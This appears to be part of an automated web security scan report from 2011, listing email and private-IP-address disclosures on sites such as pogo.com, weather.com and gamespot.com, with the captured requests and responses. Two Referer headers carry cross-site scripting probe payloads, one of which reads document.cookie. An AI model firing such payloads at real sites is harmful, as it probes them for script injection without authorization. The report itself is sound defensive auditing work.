<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
</div>
By filling out a profile, you agree to receive invitations to participate in our Internet surveys. If you would like to discontinue receiving invitations to participate, please e-mail us at support@peanutlabs.com and write "Remove Name" in the subject line. If a respondent chooses to formally end their survey participation, all information related to their individual profile will be permanently removed from ou
...[SNIP]...
<a class="" href="mailto:support@peanutlabs.com">support@peanutlabs.com</a>
...[SNIP]...

20.85. http://www.peanutlabs.com/userGreeting.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.peanutlabs.com
Path:	/userGreeting.php

Issue detail

The following email address was disclosed in the response:

test4@fastdial.net

Request

Response

20.86. http://www.pogo.com/account/my-account/main.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/account/my-account/main.do

Issue detail

The following email address was disclosed in the response:

test@fastdial.net

Request

Response

20.87. http://www.pogo.com/misc/advertise.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/misc/advertise.jsp

Issue detail

The following email addresses were disclosed in the response:

EastOnlineAdSales@ea.com
WestMidwestOnline@ea.com
WestMidwestonline@ea.com

Request

GET /misc/advertise.jsp HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 01:58:45 GMT
Server: Apache-Coyote/1.1
Content-Length: 13093

<html>
<head>
<title>Advertise on Pogo</title>
</head>

<body topmargin="0" leftmargin="0" rightmargin="0" bottommargin="0" bgcolor="#336600">
<div align="center">



...[SNIP]...
<a href="mailto:WestMidwestonline@ea.com">WestMidwestOnline@ea.com</a>
...[SNIP]...
<a href="mailto:EastOnlineAdSales@ea.com">EastOnlineAdSales@ea.com</a>
...[SNIP]...

20.88. http://www.pogo.com/prize/prize.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/prize/prize.do

Issue detail

The following email address was disclosed in the response:

test@fastdial.net

Request

Response

20.89. http://www.pogo.com/v/ERWvfg/include/js/shared/markup2.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/v/ERWvfg/include/js/shared/markup2.js

Issue detail

The following email address was disclosed in the response:

jsainz@ea.com

Request

GET /v/ERWvfg/include/js/shared/markup2.js HTTP/1.1
Host: www.pogo.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/home/home.jsp?f9258%22%3E%3Cscript%3Ealert(1)%3C/script%3E4225969d669=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=DBFBE7E5DB27E8444071339BA4CA19A0.000195; com.pogo.unid=6606578824406775

Response

HTTP/1.1 200 OK
Age: 130169
Date: Fri, 07 Jan 2011 13:24:32 GMT
Expires: Wed, 06 Jan 2016 13:24:32 GMT
Cache-Control: max-age=157680000
Connection: Keep-Alive
Via: POGO-EDGE
ETag: W/"8152-1233362214000"
Last-Modified: Sat, 31 Jan 2009 00:36:54 GMT
Content-Type: text/javascript
Content-Length: 8152
Server: Apache-Coyote/1.1

// copyright ea.com 2007

// This js allows the use of 'progressive enhancement' markup using class attributes rather than inline javascript.
// @see http://domscripting.com/presentations/xtech2006/

...[SNIP]...
<img src="path/to/image.gif" class="imgover" />
//    make sure your hover image is named image-over.gif
//    jsainz@ea.com 2007-03-02
Markup.imgOvers = function() {
   if (!document.getElementById) return

   var aPreLoad = new Array();
   var sTempSrc;

   var aInputs = document.getElementsByTagName("input");
   var aImg = docum
...[SNIP]...

20.90. http://www.pogo.com/v/ESf4UQ/js/lightreg.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/v/ESf4UQ/js/lightreg.js

Issue detail

The following email address was disclosed in the response:

jsainz@ea.com

Request

GET /v/ESf4UQ/js/lightreg.js HTTP/1.1
Host: www.pogo.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/action/pogo/lightregview.do
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536332622-New%7C1297128332622%3B

Response

HTTP/1.1 200 OK
Age: 130231
Date: Fri, 07 Jan 2011 13:24:35 GMT
Expires: Wed, 06 Jan 2016 13:24:36 GMT
Cache-Control: max-age=157680000
Connection: Keep-Alive
Via: POGO-EDGE
ETag: W/"2771-1234560505000"
Last-Modified: Fri, 13 Feb 2009 21:28:25 GMT
Content-Type: text/javascript
Vary: Accept-Encoding
Server: Apache-Coyote/1.1
Content-Length: 2771

//    fixSelected defaults the selected country option to the
// first set of countries when more than 1 is selected
//    jsainz@ea.com 03.01.2007
ct='';
function fixSelected() {
   var opts = document.forms['regSignupform'].country.getElementsByTagName('option');
   //first we loop through to find the selected country
   for(var i = 0;
...[SNIP]...
<img src="path/to/image.gif" class="imgover" />
//    make sure your hover image is named image-over.gif
//    jsainz@ea.com 2007-03-02
function imgOvers() {
   if (!document.getElementById) return

   var aPreLoad = new Array();
   var sTempSrc;

   var aInputs = document.getElementsByTagName("input");
   var aImg = document.getEl
...[SNIP]...

20.91. https://www.pogo.com/v/ERWvfg/include/js/shared/markup2.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.pogo.com
Path:	/v/ERWvfg/include/js/shared/markup2.js

Issue detail

The following email address was disclosed in the response:

jsainz@ea.com

Request

GET /v/ERWvfg/include/js/shared/markup2.js HTTP/1.1
Host: www.pogo.com
Connection: keep-alive
Referer: https://www.pogo.com/action/pogop/heavyregview.do
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536548428-New%7C1297128548428%3B

Response

HTTP/1.1 200 OK
Age: 134467
Date: Fri, 07 Jan 2011 13:24:31 GMT
Expires: Wed, 06 Jan 2016 13:24:32 GMT
Cache-Control: max-age=157680000
Connection: Keep-Alive
Via: POGO-EDGE
ETag: W/"8152-1233362214000"
Last-Modified: Sat, 31 Jan 2009 00:36:54 GMT
Content-Type: text/javascript
Vary: Accept-Encoding
Server: Apache-Coyote/1.1
Content-Length: 8152

// copyright ea.com 2007

// This js allows the use of 'progressive enhancement' markup using class attributes rather than inline javascript.
// @see http://domscripting.com/presentations/xtech2006/

...[SNIP]...
<img src="path/to/image.gif" class="imgover" />
//    make sure your hover image is named image-over.gif
//    jsainz@ea.com 2007-03-02
Markup.imgOvers = function() {
   if (!document.getElementById) return

   var aPreLoad = new Array();
   var sTempSrc;

   var aInputs = document.getElementsByTagName("input");
   var aImg = docum
...[SNIP]...

20.92. http://www.slidedeck.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.slidedeck.com
Path:	/

Issue detail

The following email addresses were disclosed in the response:

orders@slidedeck.com
paypaladmin@slidedeck.com

Request

GET /?ws_plugin__s2member_js_w_globals=1&qcABC=1&ver=1.01292363477 HTTP/1.1
Host: www.slidedeck.com
Proxy-Connection: keep-alive
Referer: http://www.slidedeck.com/download71eb8--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E873957fd8a7
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 03:30:07 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Expires: Sun, 16 Jan 2011 03:30:08 GMT
Last-Modified: Sun, 09 Jan 2011 03:30:08 GMT
Cache-Control: max-age=604800
Pragma: public
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript; charset=utf-8
Content-Length: 31679

var S2MEMBER_VERSION = '3.3.2',S2MEMBER_CURRENT_USER_IS_LOGGED_IN = false,S2MEMBER_CURRENT_USER_IS_LOGGED_IN_AS_MEMBER = false,S2MEMBER_CURRENT_USER_ACCESS_LEVEL = -1,S2MEMBER_CURRENT_USER_ACCESS_LABE
...[SNIP]...
ILE_DOWNLOADS_ALLOWED_DAYS = 0,S2MEMBER_LEVEL4_FILE_DOWNLOADS_ALLOWED_DAYS = 0,S2MEMBER_FILE_DOWNLOAD_INLINE_EXTENSIONS = '',S2MEMBER_REG_EMAIL_FROM_NAME = 'SlideDeck',S2MEMBER_REG_EMAIL_FROM_EMAIL = 'orders@slidedeck.com',S2MEMBER_PAYPAL_NOTIFY_URL = 'http://www.slidedeck.com/?s2member_paypal_notify=1',S2MEMBER_PAYPAL_RETURN_URL = 'http://www.slidedeck.com/?s2member_paypal_return=1',S2MEMBER_PAYPAL_ENDPOINT = 'www.paypal.com',S2MEMBER_PAYPAL_BUSINESS = 'paypaladmin@slidedeck.com',S2MEMBER_CURRENT_USER_VALUE_FOR_PP_ON0 = '',S2MEMBER_CURRENT_USER_VALUE_FOR_PP_OS0 = '';
jQuery(document).ready(function(a){ws_plugin__s2member_uniqueFilesDownloaded=[];if(S2MEMBER_CURRENT_USER_IS_LO
...[SNIP]...

21. Private IP addresses disclosed previous next
There are 8 instances of this issue:

http://online.wsj.com/article/SB10001424052748704415104576066830729058232.html
http://www.adobe.com/events/main.jsp
http://www.facebook.com/peanutlabs
http://www.gamespot.com/
http://www.weather.com/weather/local/48617
http://www.weather.com/weather/local/48858
http://www.weather.com/weather/local/48879
http://www.weather.com/weather/local/USMI0020

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.

21.1. http://online.wsj.com/article/SB10001424052748704415104576066830729058232.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://online.wsj.com
Path:	/article/SB10001424052748704415104576066830729058232.html

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.240.80.246

Request

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 01:21:36 GMT
Server: Apache/2.0.58 (Unix)
Set-Cookie: djcs_route=aa545813-1265-4e4a-a92e-4927fb4c2e16; domain=.wsj.com; path=/; Expires=Tue Jan 05 20:21:36 2021; max-age=315360000
Set-Cookie: DJSESSION=ORCS%3dna%2cus; path=/; domain=.wsj.com
Set-Cookie: DJCOOKIE=ORC%3dna%2cus; path=/; domain=.wsj.com; expires=Mon, 09-Jan-2012 01:21:36 GMT
Set-Cookie: wsjregion=na%2cus; path=/; domain=.wsj.com
FastDynaPage-ServerInfo: sbkj2kapachep06 - Sat 01/08/11 - 15:27:12 EST
Cache-Control: max-age=15
Expires: Sun, 09 Jan 2011 01:21:51 GMT
Vary: Accept-Encoding
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
Keep-Alive: timeout=2, max=46
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 139880

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...

...[SNIP]...

21.2. http://www.adobe.com/events/main.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.adobe.com
Path:	/events/main.jsp

Issue detail

The following RFC 1918 IP address was disclosed in the response:

192.168.112.2

Request

GET /events/main.jsp HTTP/1.1
Host: www.adobe.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 05:27:31 GMT
Server: Jetty/4.2.x (SunOS/5.10 sparc java/1.4.2_02)
Set-Cookie: AWID=10.116.66.9.1294550851826;path=/;domain=.adobe.com;expires=Tue, 05-Jan-2021 21:27:31 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=1c1o9aj6r4w3c;path=/
Cache-Control: max-age=900
Expires: Sun, 09 Jan 2011 05:42:31 GMT
Connection: close
Vary: Accept-Encoding, User-Agent

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html x
...[SNIP]...
<im'+'g src="'+s_docPrcl+'//192.168.112.2O7.net/b/ss/'+s_accountName+'/1/F.3-fb/s'+s_tm.getTime()+'?[AQB]'
+'&pageName='+escape(s_wd.s_pageName?s_wd.s_pageName:(s_wd.pageName?s_wd.pageName:''))
+'&server='+escape(s_wd.s_server?s_wd.s_serv
...[SNIP]...
<img
src="http://192.168.112.2O7.net/b/ss/mxmacromedia/1/F.3-XELvs"
height="1" width="1" border="0" alt="" />
...[SNIP]...

21.3. http://www.facebook.com/peanutlabs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/peanutlabs

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.22.87

Request

Response

21.4. http://www.gamespot.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gamespot.com
Path:	/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.15.4.104

Request

GET / HTTP/1.1
Host: www.gamespot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 01:43:55 GMT
Server: Apache
Accept-Ranges: bytes
X-Powered-By: PHP/5.2.5
Set-Cookie: geolocn=MTczLjE5My4yMTQuMjQzOjg0MDo2MjM%3D; expires=Tue, 08-Feb-2011 01:43:55 GMT; path=/; domain=.gamespot.com
Set-Cookie: ctk=NGQyOTEyZGJhZGMxZDZmMzEyMjkyNmUwMDViNQ%3D%3D; expires=Fri, 08-Jul-2011 01:43:55 GMT; path=/; domain=.gamespot.com
Set-Cookie: gspot_promo_010811=1; expires=Wed, 12-Jan-2011 01:43:55 GMT; path=/; domain=.gamespot.com
Set-Cookie: gspot_side_010811=1; expires=Wed, 12-Jan-2011 01:43:55 GMT; path=/; domain=.gamespot.com
Set-Cookie: hello_from_gs=1; path=/; domain=.gamespot.com
Keep-Alive: timeout=300, max=994
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 98766

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com
...[SNIP]...
<!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=1/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=1%3A/POS=100/PTYPE=6554/REMOTE_ADDR=173.193.214.243/SITE=6/SP=182/UA
...[SNIP]...
<!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=1/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=1%3A/PAGESTATE=1%7C%7C%3B%3B%3B%7C%2d1/POS=100/PTYPE=2000/REMOTE_ADD
...[SNIP]...
<!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=1/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=1%3A/POS=100/PTYPE=2000/REMOTE_ADDR=173.193.214.243/SITE=6/SP=119/UA
...[SNIP]...
<!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=1/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=1%3A/PAGESTATE=1%7C%7C%3B%3B%3B%7C%2d1/POS=100/PTYPE=2000/REMOTE_ADD
...[SNIP]...
<!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=1/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=1%3A/PAGESTATE=1%7C%7C%3B%3B%3B%7C%2d1/POS=100/PTYPE=2000/REMOTE_ADD
...[SNIP]...
<!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=1/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=1%3A/PAGESTATE=1%7C%7C%3B%3B%3B%7C%2d1/POS=200/PTYPE=2000/REMOTE_ADD
...[SNIP]...
<!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=1/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=1%3A/PAGESTATE=1%7C%7C%3B%3B%3B%7C%2d1/POS=100/PTYPE=2000/REMOTE_ADD
...[SNIP]...
<!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=1/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=1%3A23236%3A154%3A/PAGESTATE=1%7C%7C%3B%3B%3B%7C%2d1/POS=100/PTYPE=2
...[SNIP]...
<!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=1/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=1%3A23236%3A154%3A/PAGESTATE=1%7C%7C%3B%3B%3B%7C%2d1/POS=100/PTYPE=2
...[SNIP]...
<!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=1/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=1%3A23236%3A154%3A/PAGESTATE=1%7C%7C%3B%3B%3B%7C%2d1/POS=500/PTYPE=2
...[SNIP]...
<!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=1/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=1%3A23236%3A154%3A/PAGESTATE=1%7C%7C%3B%3B%3B%7C%2d1/POS=300/PTYPE=2
...[SNIP]...

21.5. http://www.weather.com/weather/local/48617 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.weather.com
Path:	/weather/local/48617

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

172.16.183.25
172.16.24.25

Request

GET /weather/local/48617 HTTP/1.1
Host: www.weather.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 09 Jan 2011 01:44:04 GMT
Server: Apache
SVRNAME: web2x00
Location: http://www.weather.com/weather/today/Clare+MI+48617
Cache-Control: no-cache
Pragma: no-cache
Vary: Accept-Encoding
Keep-Alive: timeout=1, max=7403
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 85909

   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<HTML>
   <HEAD>
       <TITLE>Page Not Found</TITLE>
<script language="JavaScript">
var usingGrids =
...[SNIP]...

       var remoteAddr="172.16.183.25";


                   var cssSpot = '/v.20101026.1';
           var extdivtoolsVAR = '/v.20101222.3';
           var triggerParamsstdLauncherVAR = '/v.20100929.6';
           var bust_hat = '/v.20100727.0';
           var bust_globalNav='/v.
...[SNIP]...
l ads test code
/*
if (adTest)
{
if ((remoteAddr.indexOf("10.") == 0)||
(remoteAddr.indexOf("169.254.") == 0)||
(remoteAddr.indexOf("192.168.") == 0)||
(remoteAddr.indexOf("172.16.24.25") == 0))
{
    OAS_host=adTest;
}
}
*/
OAS_target="_top";OAS_version=10;OAS_rn='001234567890';OAS_rns='1234567890';
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring(2,11);
...[SNIP]...

21.6. http://www.weather.com/weather/local/48858 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.weather.com
Path:	/weather/local/48858

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

172.16.183.242
172.16.24.25

Request

GET /weather/local/48858 HTTP/1.1
Host: www.weather.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 09 Jan 2011 01:44:04 GMT
Server: Apache
SVRNAME: web2x03
Location: http://www.weather.com/weather/today/Mount+Pleasant+MI+48858
Cache-Control: no-cache
Pragma: no-cache
Vary: Accept-Encoding
Keep-Alive: timeout=1, max=7380
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 85910

   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<HTML>
   <HEAD>
       <TITLE>Page Not Found</TITLE>
<script language="JavaScript">
var usingGrids =
...[SNIP]...

       var remoteAddr="172.16.183.242";


                   var cssSpot = '/v.20101026.1';
           var extdivtoolsVAR = '/v.20101222.3';
           var triggerParamsstdLauncherVAR = '/v.20100929.6';
           var bust_hat = '/v.20100727.0';
           var bust_globalNav='/v.
...[SNIP]...
l ads test code
/*
if (adTest)
{
if ((remoteAddr.indexOf("10.") == 0)||
(remoteAddr.indexOf("169.254.") == 0)||
(remoteAddr.indexOf("192.168.") == 0)||
(remoteAddr.indexOf("172.16.24.25") == 0))
{
    OAS_host=adTest;
}
}
*/
OAS_target="_top";OAS_version=10;OAS_rn='001234567890';OAS_rns='1234567890';
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring(2,11);
...[SNIP]...

21.7. http://www.weather.com/weather/local/48879 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.weather.com
Path:	/weather/local/48879

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

172.16.183.242
172.16.24.25

Request

GET /weather/local/48879 HTTP/1.1
Host: www.weather.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 09 Jan 2011 01:44:05 GMT
Server: Apache
SVRNAME: web2x05
Location: http://www.weather.com/weather/today/Saint+Johns+MI+48879
Cache-Control: no-cache
Pragma: no-cache
Vary: Accept-Encoding
Keep-Alive: timeout=1, max=7495
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 85910

   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<HTML>
   <HEAD>
       <TITLE>Page Not Found</TITLE>
<script language="JavaScript">
var usingGrids =
...[SNIP]...

       var remoteAddr="172.16.183.242";


                   var cssSpot = '/v.20101026.1';
           var extdivtoolsVAR = '/v.20101222.3';
           var triggerParamsstdLauncherVAR = '/v.20100929.6';
           var bust_hat = '/v.20100727.0';
           var bust_globalNav='/v.
...[SNIP]...
l ads test code
/*
if (adTest)
{
if ((remoteAddr.indexOf("10.") == 0)||
(remoteAddr.indexOf("169.254.") == 0)||
(remoteAddr.indexOf("192.168.") == 0)||
(remoteAddr.indexOf("172.16.24.25") == 0))
{
    OAS_host=adTest;
}
}
*/
OAS_target="_top";OAS_version=10;OAS_rn='001234567890';OAS_rns='1234567890';
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring(2,11);
...[SNIP]...

21.8. http://www.weather.com/weather/local/USMI0020 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.weather.com
Path:	/weather/local/USMI0020

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

172.16.183.23
172.16.24.25

Request

GET /weather/local/USMI0020 HTTP/1.1
Host: www.weather.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 09 Jan 2011 01:44:03 GMT
Server: Apache
SVRNAME: web2x07
Location: http://www.weather.com/weather/today/Alma+MI+USMI0020
Cache-Control: no-cache
Pragma: no-cache
Vary: Accept-Encoding
Keep-Alive: timeout=1, max=7485
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 85909

   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<HTML>
   <HEAD>
       <TITLE>Page Not Found</TITLE>
<script language="JavaScript">
var usingGrids =
...[SNIP]...

       var remoteAddr="172.16.183.23";


                   var cssSpot = '/v.20101026.1';
           var extdivtoolsVAR = '/v.20101222.3';
           var triggerParamsstdLauncherVAR = '/v.20100929.6';
           var bust_hat = '/v.20100727.0';
           var bust_globalNav='/v.
...[SNIP]...
l ads test code
/*
if (adTest)
{
if ((remoteAddr.indexOf("10.") == 0)||
(remoteAddr.indexOf("169.254.") == 0)||
(remoteAddr.indexOf("192.168.") == 0)||
(remoteAddr.indexOf("172.16.24.25") == 0))
{
    OAS_host=adTest;
}
}
*/
OAS_target="_top";OAS_version=10;OAS_rn='001234567890';OAS_rns='1234567890';
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring(2,11);
...[SNIP]...

